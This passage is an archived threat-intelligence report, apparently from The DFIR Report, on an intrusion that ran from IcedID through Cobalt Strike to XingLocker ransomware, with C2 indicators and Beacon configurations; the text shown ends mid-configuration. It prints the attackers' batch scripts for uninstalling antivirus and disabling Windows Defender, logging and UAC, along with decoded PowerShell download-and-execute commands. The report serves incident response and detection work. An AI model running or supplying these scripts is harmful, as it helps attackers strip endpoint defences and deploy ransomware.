{
	"id": "61cc7272-377d-4d5c-91d3-6397180c420d",
	"created_at": "2026-04-06T00:14:41.730945Z",
	"updated_at": "2026-04-10T03:24:24.575301Z",
	"deleted_at": null,
	"sha1_hash": "9c516fb58cb70db768fb119f3823c4b83909ac0a",
	"title": "IcedID to XingLocker Ransomware in 24 hours",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2559614,
	"plain_text": "IcedID to XingLocker Ransomware in 24 hours\r\nBy editor\r\nPublished: 2021-10-18 · Archived: 2026-04-05 22:34:03 UTC\r\nIntro\r\nTowards the end of July, we observed an intrusion that began with IcedID malware and ended in XingLocker ransomware, a\r\nMountlocker variant. XingLocker made its first appearance in early May of this year. The new group was featured in the\r\nAstroLocker ransomware blog, and it has been very active since then.\r\nIn this intrusion, we observed the threat actors use multiple DLL Beacons that would call out to different Cobalt Strike C2\r\nchannels. It appears that operators used different payloads, to accomplish different tasks, on each phase of the intrusion. The\r\nthreat actors used batch scripts during the intrusion for a number of purposes, primarily to disable antivirus programs and\r\nexecute payloads.\r\nCase Summary\r\nThis case started with an IcedID infection from a malware campaign as reported by Myrtus. As with most commodity\r\nmalware we see, IcedID executes the initial discovery commands and then exfiltrates the results via the C2 channel. If threat\r\nactors find the organization to be of interest, they will launch the next phase. In some cases, there might be different threat\r\nactor groups working on different phases of the attack. In this instance, the threat actors instructed IcedID to download and\r\nexecute the next stage malware two hours after the initial compromise. The payload was a Cobalt Strike Beacon in the form\r\nof a DLL.\r\nUpon initial execution, Cobalt Strike ran some discovery commands before injecting into the LSASS process to steal cached\r\ncredentials. The threat actors did not waste any time, and within four minutes, they gained administrative credentials then\r\nbegan searching for the domain controllers. Once the domain controllers were identified, they used Cobalt Strike’s “jump\r\npsexec_psh” capability, which creates a Windows service that executes a Beacon executable to move laterally. Having\r\ngained access to the domain controllers, the attackers downloaded and executed AdFind to collect further information about\r\nthe domain.\r\nThe attacker’s preferred scripting various parts of the intrusion via batch scripts. They had a script for persistence, defense\r\nevasion and execution tasks. A complete list of those scripts came from hxxps://styservice[.]com as we shared with the\r\ncommunity in this tweet thread. The first batch script we saw was to schedule a task which would execute a command to\r\nload a Cobalt Strike Beacon into memory using regsvr32. This persistence mechanism was only seen on the domain\r\ncontrollers and one other critical server.\r\nThe lateral movement and execution of batch scripts continued with the operators expanding their network footprint. It is\r\nworth mentioning that it appears they chose which hosts to pivot to by assessing the importance implied by their hostnames.\r\nAfter landing on an “important” host, the first task was to execute various batch scripts to disable antivirus programs. On\r\none host, common backup utilities were also disabled.\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 1 of 24\n\nThree hours into the intrusion and the attackers had deployed Beacons across various hosts on the network. Despite that,\r\nthey deployed another Beacon using a PowerShell loader method, this time on the beachhead. They used this Beacon to run\r\nPowerView’s Invoke-ShareFinder module in an effort to discover potentially interesting directories and files. BloodHound\r\nwas also executed as part their reconnaissance activities. At the same time, the operators performed an exhaustive port scan\r\non the servers they had earlier identified to be “important”. Minutes away from meeting their final objective, the operators\r\nmanually searched for files and directories of interest for the second time.\r\nAround 23 hours after the initial intrusion, the threat actors moved towards their final objective of deploying XingLocker\r\nransomware. The deployment took place via wmic and batch scripts. We did not observe any overt exfiltration of data;\r\nhowever, it is possible that the threat actors used Cobalt Strike to transmit sensitive data.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found here.\r\nThe Cobalt Strike servers in this case were added to the Threat Feed on 7/19, 7/26 and 7/27.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 2 of 24\n\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 3 of 24\n\nAnalysis and reporting completed by @kostastsale and @0xtornado\r\nReviewed by @RoxpinTeddy\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThe IcedID infection came as a result of a phishing campaign as reported by Myrtus on Twitter.\r\nInitial IcedID was executed on the beachhead using regsvr32.exe\r\nAutomated analysis of this IcedID sample extracts the following configuration for the staging server:\r\n{\r\n \"Campaign ID\": 1394912167,\r\n \"C2 url\": \"feedbackfileweb.club\"}\r\nIcedID core analysis show additional C2 infrastructure as per this sample:\r\ngsterangsic.buzz\r\noscanonamik.club\r\nriderskop.top\r\niserunifish.club\r\nExecution\r\nUpon the execution of the IcedID sample, we observed a download and execution of a malicious DLL ikaqkk.dll :\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 4 of 24\n\nBelow is a screenshot of packet where we can spot the GZIPLOADER downloading the first stage from the C2:\r\nA detailed GZIPLOADER analysis from Binary Defense is available here.\r\nThe DLL was then executed using rundll32.exe one second later:\r\nrundll32.exe \"C:\\Users\\REDACTED\\AppData\\Local\\REDACTED\\ikaqkk.dll\",update /i:\"TimberMule\\license.dat\"\r\nCobalt strike Beacon DLLHost.exe was downloaded and loaded via process hollowing a few hours after the initial IcedID\r\nexecution:\r\nThe threat actors connected to the machine to run the first discovery commands using Cobalt Strike Beacon. The threat\r\nactors then downloaded an additional Cobalt Strike Beacon kaslose.dll via curl and executed it via regsvr32 :\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 5 of 24\n\nThe Threat actors also executed HTA and PowerShell loader to load Cobalt Strike Beacon in memory on beachhead:\r\nPersistence\r\nIcedID Persistence\r\nUpon IcedID execution, a scheduled task named {3D0CCC72-D85D-7A63-8C0A-66CF5BAFD686} was created. The task was\r\nscheduled to execute every hour:\r\nThe new scheduled task was registered under EID 106 as seen below. (EIDs: 106,200,201 “Microsoft-Windows-TaskScheduler\\Operational.evtx”)\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 6 of 24\n\nCorrelating this with Process Execution logs from MDE, shows that the task was executing the IcedID downloaded DLL:\r\nCobalt Strike Persistence\r\nWhile analyzing this intrusion, we observed further persistence via scheduled tasks associated with post-exploitation\r\nactivities.\r\nThis scheduled task with name HpSupport executed a Cobalt Strike Beacon kaslose64.dll both on the Domain\r\nController and the File Server:\r\nOn the File Server, the same Scheduled task was created with a slightly different name:\r\nThe star.bat script contained the following lines in both cases:\r\n!echo OFF\r\nregsvr32 C:\\users\\public\\music\\kaslose64.dll\r\nDefense Evasion\r\nProcess Injection: Process Hollowing\r\nIcedID reached out to 37.120.222[.]100:8080 to download and load Cobalt Strike Beacon via process hollowing technique:\r\nKilling multiple Services and Disabling Security Tools\r\nThe threat actors executed a 1698 line batch script kasper.bat on a file server, which kills multiple processes using taskill,\r\nstops/disables several services using net stop and sc config and disables a number of security tools using WMI.\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 7 of 24\n\nHere is an extract from the kasper.bat script:\r\nstart wmic product where name=\"Webroot SecureAnywhere\" call uninstall /nointeractive\r\nstart wmic product where name=\"Symantec Endpoint Protection\" call uninstall /nointeractive\r\nstart wmic product where name=\"AVG 2015\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee VirusScan Enterprise\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee Agent\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee DLP Endpoint\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee Endpoint Security Platform\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee Endpoint Security Threat Prevention\" call uninstall /nointeractive\r\nstart wmic product where name=\"Microsoft Security Client\" call uninstall /nointeractive\r\nstart wmic product where name=\"Malwarebytes' Managed Client\" call uninstall /nointeractive\r\nstart wmic product where name=\"Sophos System Protection\" call uninstall /nointeractive\r\nstart wmic product where name=\"Sophos AutoUpdate\" call uninstall /nointeractive\r\nstart wmic product where name=\"Sophos Remote Management System\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee SiteAdvisor Enterprise\" call uninstall /nointeractive\r\nstart wmic product where name=\"Symantec Backup Exec Remote Agent for Windows\" call uninstall /nointeractive\r\nstart wmic product where name=\"ESET File Security\" call uninstall /nointeractive\r\nreg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\r\npowershell.exe Set-MpPreference -DisableRealtimeMonitoring $true\r\npowershell.exe Uninstall-WindowsFeature -Name Windows-Defender\r\nDisabling Windows Defender using multiple techniques\r\nThe threat actors executed three other scripts named fed1.bat , fed2.bat and fed3.bat using PowerShell and\r\nmanipulating several registry keys to disable Windows Defender.\r\nContent of fed1.bat script:\r\n@echo off\r\npowershell.exe Set-MpPreference -DisableRealtimeMonitoring $true\r\npowershell.exe Uninstall-WindowsFeature -Name Windows-Defender\r\nREG ADD \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f\r\nrem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!\r\nrem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\r\nrem To also disable Windows Defender Security Center include this\r\nrem reg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nrem 1 - Disable Real-time protection\r\nreg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_D\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f\r\nContent of fed2.bat script:\r\n@echo off\r\nrem 0 - Disable Logging\r\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nrem Disable WD Tasks\r\nschtasks /Change /TN \"Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh\" /Disable\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 8 of 24\n\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /Disable\r\nrem Disable WD systray icon\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WindowsDefender\" /f\r\nrem Remove WD context menu\r\nreg delete \"HKCR\\*\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nrem Disable WD services\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdBoot\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdFilter\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WinDefend\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nrem Run \"Disable WD.bat\" again to disable WD services\r\nREG ADD \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f\r\nContent of fed3.bat script:\r\n@echo off\r\nrem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!\r\nrem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\r\nrem To also disable Windows Defender Security Center include this\r\nrem reg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nrem 1 - Disable Real-time protection\r\nreg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_D\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f\r\nrem 0 - Disable Logging\r\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nrem Disable WD Tasks\r\nschtasks /Change /TN \"Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /Disable\r\nrem Disable WD systray icon\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WindowsDefender\" /f\r\nrem Remove WD context menu\r\nreg delete \"HKCR\\*\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nrem Disable WD services\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdBoot\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdFilter\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WinDefend\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 9 of 24\n\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nrem Run \"Disable WD.bat\" again to disable WD services\r\nIt appears that the information from these 3 scripts were lifted from the first revision of Revisions · quick-disable-windows-defender.bat · GitHub. Fed1 is half of that batch file and Fed2 is the other half. Fed3 is a complete copy. This tells us that the\r\nthreat actor was not aware of what was in these scripts or else they wouldn’t have ran fed1/fed2 and fed3 considering they\r\ndo the same thing.\r\nCredential Access\r\nThe threat actors injected into a high privileged process and then access cached credentials from LSASS:\r\nRelated named pipe activity based on Cobalt Strike patterns for using Mimikatz Pass-The-Hash function to run local and\r\nremote commands. The named pipe was used to pass the results back to the Beacon process.\r\nWindows EID: 4673 – A privileged service was called:\r\nDiscovery\r\nIcedID initial Environment Discovery\r\nSeveral discovery commands executed from IcedID after the initial execution:\r\nipconfig /all\r\ncmd.exe /c chcp \u003e\u00262\r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 10 of 24\n\nCobalt Strike Beacon Discovery\r\nCobalt Strike’s appino Beacon, ran discovery commands upon initial execution:\r\ncmd.exe /C ping -n 1\u003credacted\u003e\r\ncmd.exe /C ping -n 1 \u003credacted\u003e\r\ncmd.exe /C nltest /domain_trusts\u0026nltest /dclist:\u0026c:\\windows\\sysnative\\nltest /domain_trusts\u0026c:\\windows\\sysnative\\nltest /d\r\ncmd.exe /C netstat -a -n -p tcp | find \"ESTAB\"\r\ncmd.exe /C net group \"domain Admins\" /DOMAIN\r\ncmd.exe /C net group \"Domain Computers\" /DOMAIN\r\ncmd.exe /C ipconfig /all\r\nActive Directory Domain Discovery\r\nDiscovering domain controllers prior to pivoting:\r\nAfter discovering and pivoting to the Domain Controller, threat actors used both AdFind and BloodHound to explore the\r\nActive Directory Domain.\r\nExecuting Adfind on the Domain Controller:\r\nEvidence of BloodHound execution on the Domain Controller:\r\nThe threat actors also executed PowerView Invoke-ShareFinder module on the beachhead host:\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0\r\nDecoded command:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:10966/'); Invoke-ShareFinder -CheckShareAccess\r\nThe threat actors also executed PowerView Invoke-FindLocalAdminAccess module on one of the compromised servers:\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 11 of 24\n\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0\r\nDecoded command:\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:37923/'); Invoke-FindLocalAdminAccess -threads 50\r\nWe also saw exhaustive port scanners of certain servers before additional discovery.\r\nFile and Directory Discovery\r\nThe following discovery commands were run on all hosts including the Domain Controllers:\r\nLateral Movement\r\nThe first Lateral Movement to the Domain Controller was performed using remote services creation (Executing\r\nspoolsv.exe via remote services):\r\nThe spoolsv.exe binary is a Cobalt Strike artifact used for Lateral Movement and C2 which decodes to the configuration\r\nbelow:\r\n{\r\n \"BeaconType\": [\r\n \"HTTPS\"\r\n ],\r\n \"Port\": 443,\r\n \"SleepTime\": 4000,\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 12 of 24\n\n\"MaxGetSize\": 1403644,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"kaslose.com,/jquery-3.3.1.min.js\",\r\n \"HttpPostUri\": \"/jquery-3.3.2.min.js\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 1522 bytes from the end\",\r\n \"Remove 84 bytes from the beginning\",\r\n \"Remove 3931 bytes from the beginning\",\r\n \"Base64 URL-safe decode\",\r\n \"XOR mask w/ random key\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 0,\r\n \"bStageCleanup\": \"True\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"False\",\r\n \"bProcInject_UseRWX\": \"False\",\r\n \"bProcInject_MinAllocSize\": 17500,\r\n \"ProcInject_PrependAppend_x86\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_PrependAppend_x64\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_Execute\": [\r\n \"ntdll:RtlUserThreadStart\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"}\r\nAdditional Lateral Movement technique was observed, where the threat actors used Cobalt Strike’s jump psexec_psh :\r\nUsing Cyberchef (recipe), we decoded the obfuscated powershell loader, which is using the default named pipe\r\n\\.\\pipe\\status_f5 :\r\nThreat actors also pivoted to a domain controller by using the same Cobalt Strike artifacts, spoolsv.exe via remote service\r\ncreation:\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 13 of 24\n\nenter image description here\r\nRight after initial Lateral Movement, a second Cobalt Strike Beacon kaslose64.dll was executed on a critical server.\r\nenter image description here\r\nCommand and Control\r\nRita stands for Real Intelligence Threat Analytics (RITA), developed by Active Countermeasures. Rita is a framework for\r\nidentifying command and control communication, also known as beaconing. As the name implies, beaconing refers to\r\ndelivering regular messages from an infected host to an attacker-controlled host. Beacon is the malware agent installed on\r\nthe victim’s device and is responsible for communicating with the C2 server. Rita is consuming zeek/bro logs and detecting\r\nsuspected beaconing activity using network traffic calculations.\r\nIt then assigns a value ranging from 0.1 to 1.0, with the greater the score indicating that the network activity is suspicious.\r\nRita is utilized as a hunting tool rather than a real-time detection tool, though simple scripting allows Rita to be used for live\r\ntraffic analysis. However, analysts should add additional context and filter the results accordingly. Rita can only identify\r\nsuspicious communication and should not be automated as a preventative control. For more info on how RITA works check\r\nout the mathamatics here.\r\nUsing with this case network traffic RITA was able to identify all active Beacons from the impacted hosts in the network as\r\nseen in the screenshot below:\r\nIcedID:\r\ngsterangsic.buzz\r\noscanonamik.club\r\nriderskop.top\r\niserunifish.club\r\n5.61.46.161\r\n176.97.64.194\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [f8:4e:05:70:39:7b:8a:81:d3:0e:09:be:3c:68:14:00:d2:6d:8c:07]\r\nNot Before: 2021/07/21 14:07:11 UTC\r\nNot After: 2022/07/21 14:07:11 UTC\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Common: localhost\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [87:19:1c:7c:0f:4e:e0:96:5c:b4:c9:de:a0:41:47:dd:5a:ef:4e:c4]\r\nNot Before: 2021/07/21 06:53:48 UTC\r\nNot After: 2022/07/21 06:53:48 UTC\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Common: localhost\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike C2 configuration:\r\nkaslose.com (146.70.24.186) – This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 14 of 24\n\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ae4edc6faf64d08308082ad26be60767\r\nCertificate: [7e:6c:72:b8:83:e3:9f:28:e0:af:06:45:2b:73:73:f1:86:89:cc:d7]\r\nNot Before: 2021/07/20 15:53:12 UTC\r\nNot After: 2021/10/18 15:53:10 UTC\r\nIssuer Org: Let's Encrypt\r\nSubject Common: kaslose.com [kaslose.com ]\r\nPublic Algorithm: rsaEncryption\r\n{\r\n \"x64\": {\r\n \"sha256\": \"8cbd66dd196a5c54549dc350fa1734dddcff2da782a4a0682e8a79de7bbdf505\",\r\n \"sha1\": \"65c4379c9bcca13c4e357bf6cc60af4ced8090a2\",\r\n \"uri_queried\": \"/4Ovd\",\r\n \"config\": {\r\n \"Watermark\": 0,\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"C2 Host Header\": \"\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"C2 Server\": \"kaslose.com,/jquery-3.3.1.min.js\",\r\n \"Jitter\": 37,\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Polling\": 4000\r\n },\r\n \"time\": 1629006465815.1,\r\n \"md5\": \"af56c32d3d6e5ffa8b20a97580e59656\"\r\n },\r\n \"x86\": {\r\n \"sha256\": \"56ab98d818638b3108505e9778c2c0d021b9f71f882abf1626098780560e435d\",\r\n \"sha1\": \"c216520a8b30894cbd529bfb805dca7c253b85f6\",\r\n \"uri_queried\": \"/HjIa\",\r\n \"config\": {\r\n \"Watermark\": 0,\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"C2 Host Header\": \"\",\r\n 